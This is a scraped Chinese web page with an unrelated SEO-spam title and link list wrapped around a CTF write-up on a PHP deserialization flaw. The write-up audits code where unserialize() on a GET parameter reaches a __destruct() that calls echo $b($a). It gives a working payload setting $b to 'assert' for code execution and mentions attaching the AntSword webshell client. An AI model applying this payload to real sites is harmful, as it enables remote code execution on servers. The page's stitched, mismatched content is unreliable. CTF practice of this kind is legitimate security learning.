当前位置: 首页 > news >正文

access2003做网站网络推广费用预算表

access2003做网站,网络推广费用预算表,网站建设方案 doc,房地产网站开发毕业设计打开题目 直接查看源代码 打开源代码发现了个./time.php?source 访问一下 审计代码: 现存在反序列化语句:$ppp unserialize($_GET["data"]);和执行漏洞:echo $b($a); 发现在__destruct()方法里面有 echo $b($a); 这个是php的…

打开题目

直接查看源代码

 打开源代码发现了个./time.php?source

访问一下

审计代码:

现存在反序列化语句:@$ppp = unserialize($_GET["data"]);和执行漏洞:echo $b($a);

发现在__destruct()方法里面有 echo $b($a);

这个是php的特性,php可以通过这种方法动态调用方法。

思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。

payload

<?php
#error_reporting(0);
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = "phpinfo()";$this->b = "assert";}public function __destruct(){$a = $this->a;$b = $this->b;echo $b($a);}
}
$c = new HelloPhp;@$ppp = serialize($c);
echo $ppp;
?>

将得到的payload上传

发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面

得到flag

http://www.15wanjia.com/news/7261.html

相关文章:

  • 云南省建设监理协会网站湖南百度推广
  • 建设中医知识学习网站seo优化师培训
  • 推荐o2o网站建设企业网站推广的一般策略
  • 营销型网站建设实战》怎么自己创建网站
  • 仙游哪里可以做网站的深圳市seo点击排名软件价格
  • 开发 网站 沈阳百度网址大全下载安装
  • 中山市网站制作百度竞价优化
  • 用vs代码做网站百度经验首页官网
  • 网站提高收录和访问量什么建站程序最利于seo
  • 网站建设推荐公司嘉兴百度快照优化排名
  • 国外便宜的云服务器西安seo优化工作室
  • 网站建设四步骤seo行业
  • b2b2c多用户商城seo关键词排名优化的方法
  • 北京网站制作到诺然好看的seo网站
  • 做搜索引擎的网站有哪些成人速成班有哪些专业
  • 视频模板网站推荐新手seo要学多久
  • 有什么比较好的做简历的网站常见的营销手段
  • 高端网站建设文案百度标注平台怎么加入
  • 网站域名证书查询百度广告安装入口
  • 女的和男做那个视频网站武汉最新疫情
  • 做网站之前备案开发一个app需要多少钱
  • 免费做威客的网站谷歌浏览器 官网下载
  • 网站开发的目的和意义网站建站哪家公司好
  • 摄影师网站html5如何在各大平台推广
  • 餐饮网站建设需求分析网络推广网站电话
  • 哪些网站可以做调查赚钱北京网站优化排名推广
  • 网站建设咨询网站优化团队
  • 做爰的网站拼多多关键词怎么优化
  • 永州做网站费用做网络营销推广
  • 网站建设可行性方案模板湖南靠谱关键词优化